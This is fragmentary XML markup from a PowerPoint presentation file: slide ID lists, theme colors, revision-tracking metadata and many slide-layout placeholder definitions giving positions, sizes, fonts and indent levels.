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9" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId28"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId29"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="588" r:id="rId3"/>
    <p:sldId id="590" r:id="rId4"/>
    <p:sldId id="592" r:id="rId5"/>
    <p:sldId id="613" r:id="rId6"/>
    <p:sldId id="593" r:id="rId7"/>
    <p:sldId id="617" r:id="rId8"/>
    <p:sldId id="595" r:id="rId9"/>
    <p:sldId id="616" r:id="rId10"/>
    <p:sldId id="615" r:id="rId11"/>
    <p:sldId id="600" r:id="rId12"/>
    <p:sldId id="597" r:id="rId13"/>
    <p:sldId id="601" r:id="rId14"/>
    <p:sldId id="602" r:id="rId15"/>
    <p:sldId id="605" r:id="rId16"/>
    <p:sldId id="606" r:id="rId17"/>
    <p:sldId id="607" r:id="rId18"/>
    <p:sldId id="609" r:id="rId19"/>
    <p:sldId id="591" r:id="rId20"/>
    <p:sldId id="603" r:id="rId21"/>
    <p:sldId id="604" r:id="rId22"/>
    <p:sldId id="610" r:id="rId23"/>
    <p:sldId id="611" r:id="rId24"/>
    <p:sldId id="612" r:id="rId25"/>
    <p:sldId id="589" r:id="rId26"/>
    <p:sldId id="614" r:id="rId27"/>
  </p:sldIdLst>
  <p:sldSz cx="85344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26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DBC0"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="D5D5D5"/>
    <a:srgbClr val="F0C64E"/>
    <a:srgbClr val="CF5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DB4BF-6E3E-4E10-999D-83E66B2C6842}" v="186" dt="2020-06-29T16:18:46.99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548" y="78"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2016"/>
        <p:guide pos="268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cAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{0ACDB4BF-6E3E-4E10-999D-83E66B2C6842}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{0ACDB4BF-6E3E-4E10-999D-83E66B2C6842}" dt="2020-06-29T16:18:46.994" v="269" actId="14100"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{0ACDB4BF-6E3E-4E10-999D-83E66B2C6842}" dt="2020-06-29T16:18:46.994" v="269" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3957164049" sldId="591"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{0ACDB4BF-6E3E-4E10-999D-83E66B2C6842}" dt="2020-06-29T16:17:06.025" v="206" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3957164049" sldId="591"/>
            <ac:spMk id="3" creationId="{01884E43-1F99-4AEE-B654-C64ED2C3DDD7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{0ACDB4BF-6E3E-4E10-999D-83E66B2C6842}" dt="2020-06-29T16:18:42.703" v="267" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3957164049" sldId="591"/>
            <ac:spMk id="8" creationId="{ECEB5B52-5A41-4EEA-BA6A-B69F88F7434D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{0ACDB4BF-6E3E-4E10-999D-83E66B2C6842}" dt="2020-06-29T16:18:23.230" v="215" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3957164049" sldId="591"/>
            <ac:picMk id="4" creationId="{8B559B40-EBBF-43D9-A962-3CBB9F8B15AE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{0ACDB4BF-6E3E-4E10-999D-83E66B2C6842}" dt="2020-06-29T16:17:32.886" v="208" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3957164049" sldId="591"/>
            <ac:picMk id="5" creationId="{62712C32-9A30-43DA-AC1A-09976B55CDCA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{0ACDB4BF-6E3E-4E10-999D-83E66B2C6842}" dt="2020-06-29T16:17:30.998" v="207" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3957164049" sldId="591"/>
            <ac:picMk id="6" creationId="{04C2D960-5F82-4919-B95D-588DB1F539AE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{0ACDB4BF-6E3E-4E10-999D-83E66B2C6842}" dt="2020-06-29T16:18:46.994" v="269" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3957164049" sldId="591"/>
            <ac:cxnSpMk id="7" creationId="{AC33EAF1-6443-4C47-A199-D0EC1D16FB75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C0369-5EB2-4A74-B757-22D4DBDAF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9F40-A739-4262-B7E4-77D8A1157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948F-D0B8-4C0B-942E-7C815663835F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556B-939A-4E44-B191-A26485520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DC8C-7EA1-4231-877B-A5C14CCA06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180-5D79-4430-8F42-C2E71B98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606263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22062" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1069">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr indent="111031" defTabSz="222062" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1069">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr indent="222062" defTabSz="222062" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1069">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr indent="333093" defTabSz="222062" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1069">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr indent="444124" defTabSz="222062" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1069">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr indent="555155" defTabSz="222062" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1069">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr indent="666186" defTabSz="222062" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1069">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr indent="777217" defTabSz="222062" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1069">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr indent="888248" defTabSz="222062" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1069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18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18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59994"/>
            <a:ext cx="6277659" cy="257546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201" y="3960922"/>
            <a:ext cx="2153976" cy="25847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417406"/>
            <a:ext cx="6277660" cy="154964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378201" y="2417406"/>
            <a:ext cx="2153977" cy="15496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26" y="2551462"/>
            <a:ext cx="5664650" cy="1281532"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r"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26" y="4101104"/>
            <a:ext cx="5700894" cy="1043175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1867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51945" y="5540443"/>
            <a:ext cx="1920240" cy="340783"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59DC861B-55D1-4841-8648-7B4FF0205353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7841" y="5540444"/>
            <a:ext cx="3753555" cy="34078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040" y="2566981"/>
            <a:ext cx="1278940" cy="1266013"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0AB8F272-0096-499C-A25A-02BC3C9B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" y="4267200"/>
            <a:ext cx="8551171" cy="1565233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843" y="4397509"/>
            <a:ext cx="6435119" cy="508183"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr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6196" y="568959"/>
            <a:ext cx="6436765" cy="3350270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841" y="4905692"/>
            <a:ext cx="6435121" cy="511298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32676" y="4397223"/>
            <a:ext cx="1073180" cy="1018070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0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" y="4267200"/>
            <a:ext cx="8551171" cy="1565233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05" y="568957"/>
            <a:ext cx="6436765" cy="3353233"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr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196" y="4396317"/>
            <a:ext cx="6429874" cy="1028313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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32676" y="4397509"/>
            <a:ext cx="1073180" cy="1018070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53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" y="4267200"/>
            <a:ext cx="8551171" cy="1565233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727" y="575851"/>
            <a:ext cx="5996804" cy="2833657"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr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23476" y="3416712"/>
            <a:ext cx="5588549" cy="512370"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1307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196" y="4396317"/>
            <a:ext cx="6443658" cy="1028313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr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32676" y="4395931"/>
            <a:ext cx="1073180" cy="1018070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52870" y="698242"/>
            <a:ext cx="497840" cy="545791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="85344" tIns="42672" rIns="85344" bIns="4267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72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02712" y="2798669"/>
            <a:ext cx="426720" cy="545792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="85344" tIns="42672" rIns="85344" bIns="4267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72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1682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" y="4267200"/>
            <a:ext cx="8551171" cy="1565233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196" y="4396317"/>
            <a:ext cx="6436765" cy="550491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196" y="4946807"/>
            <a:ext cx="6436765" cy="477824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"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32676" y="4395931"/>
            <a:ext cx="1073180" cy="1018070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51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568960"/>
            <a:ext cx="8551171" cy="1565233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96196" y="703013"/>
            <a:ext cx="6436765" cy="10088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7120" y="2174190"/>
            <a:ext cx="2048256" cy="537845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2240" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr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03792" y="2814271"/>
            <a:ext cx="2048256" cy="2719279"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1307"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="426705" indent="0">
              <a:buNone/>
              <a:defRPr sz="1120"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="853410" indent="0">
              <a:buNone/>
              <a:defRPr sz="933"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1280114" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1706819" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2133524" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2560229" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2986933" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3413638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86519" y="2181081"/>
            <a:ext cx="2048256" cy="537845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2240" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr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687729" y="2807379"/>
            <a:ext cx="2048256" cy="2719279"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1307"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="426705" indent="0">
              <a:buNone/>
              <a:defRPr sz="1120"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="853410" indent="0">
              <a:buNone/>
              <a:defRPr sz="933"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1280114" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1706819" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2133524" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2560229" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2986933" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3413638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77727" y="2181081"/>
            <a:ext cx="2048256" cy="537845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2240" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr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884619" y="2807378"/>
            <a:ext cx="2048256" cy="2719279"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1307"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="426705" indent="0">
              <a:buNone/>
              <a:defRPr sz="1120"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="853410" indent="0">
              <a:buNone/>
              <a:defRPr sz="933"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1280114" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1706819" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2133524" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2560229" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2986933" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3413638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67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" y="568960"/>
            <a:ext cx="8551171" cy="1565233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96196" y="703013"/>
            <a:ext cx="6436765" cy="10088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96899" y="4011003"/>
            <a:ext cx="2046107" cy="537845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2240" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr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96899" y="2181081"/>
            <a:ext cx="2046107" cy="14224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493"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="426705" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="853410" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1280114" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1706819" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2133524" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2560229" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2986933" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3413638" indent="0">
              <a:buNone/>
              <a:defRPr sz="149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496899" y="4548847"/>
            <a:ext cx="2046107" cy="991594"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1307"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="426705" indent="0">
              <a:buNone/>
              <a:defRPr sz="1120"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="853410" indent="0">
              <a:buNone/>
              <a:defRPr sz="933"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1280114" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1706819" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2133524" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2560229" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2986933" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3413638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79130" y="4011003"/>
            <a:ext cx="2067399" cy="537845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2240" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr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679130" y="2181081"/>
            <a:ext cx="2067399" cy="14224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493"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="426705" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="853410" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1280114" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1706819" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2133524" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2560229" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2986933" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3413638" indent="0">
              <a:buNone/>
              <a:defRPr sz="149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678184" y="4548846"/>
            <a:ext cx="2070137" cy="991594"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1307"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="426705" indent="0">
              <a:buNone/>
              <a:defRPr sz="1120"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="853410" indent="0">
              <a:buNone/>
              <a:defRPr sz="933"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1280114" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1706819" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2133524" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2560229" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2986933" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3413638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82293" y="4011003"/>
            <a:ext cx="2048044" cy="537845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2240" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr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882292" y="2181081"/>
            <a:ext cx="2048044" cy="14224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493"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="426705" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="853410" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1280114" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1706819" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2133524" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2560229" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2986933" indent="0">
              <a:buNone/>
              <a:defRPr sz="1493"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3413638" indent="0">
              <a:buNone/>
              <a:defRPr sz="149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882206" y="4548844"/>
            <a:ext cx="2050756" cy="991594"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1307"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="426705" indent="0">
              <a:buNone/>
              <a:defRPr sz="1120"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="853410" indent="0">
              <a:buNone/>
              <a:defRPr sz="933"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1280114" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1706819" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2133524" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2560229" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2986933" indent="0">
              <a:buNone/>
              <a:defRPr sz="840"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3413638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32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" y="568960"/>
            <a:ext cx="8551171" cy="1565233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196" y="703013"/>
            <a:ext cx="6436765" cy="100887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861B-55D1-4841-8648-7B4FF0205353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F272-0096-499C-A25A-02BC3C9B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35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270285" y="2564033"/>
            <a:ext cx="6405051" cy="1276986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7145" y="568957"/>
            <a:ext cx="998295" cy="41644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6225" y="568959"/>
            <a:ext cx="6137935" cy="49714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3868" y="5540443"/>
            <a:ext cx="1920240" cy="340783"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59DC861B-55D1-4841-8648-7B4FF0205353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6225" y="5540444"/>
            <a:ext cx="4217695" cy="34078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5742" y="5070333"/>
            <a:ext cx="1072994" cy="1188227"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0AB8F272-0096-499C-A25A-02BC3C9B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08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45911" y="4104684"/>
            <a:ext cx="3014870" cy="1911883"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="224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019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" y="568960"/>
            <a:ext cx="8551171" cy="1565233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861B-55D1-4841-8648-7B4FF0205353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F272-0096-499C-A25A-02BC3C9B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2546537"/>
            <a:ext cx="8551171" cy="1565233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197" y="2678569"/>
            <a:ext cx="6429873" cy="1018069"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r"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197" y="3950028"/>
            <a:ext cx="6429873" cy="1590416"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r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08089" y="5540443"/>
            <a:ext cx="1920240" cy="340783"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59DC861B-55D1-4841-8648-7B4FF0205353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7841" y="5540444"/>
            <a:ext cx="4512361" cy="34078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32676" y="2678570"/>
            <a:ext cx="1073180" cy="1018070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0AB8F272-0096-499C-A25A-02BC3C9B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5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568960"/>
            <a:ext cx="8551171" cy="1565233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840" y="703013"/>
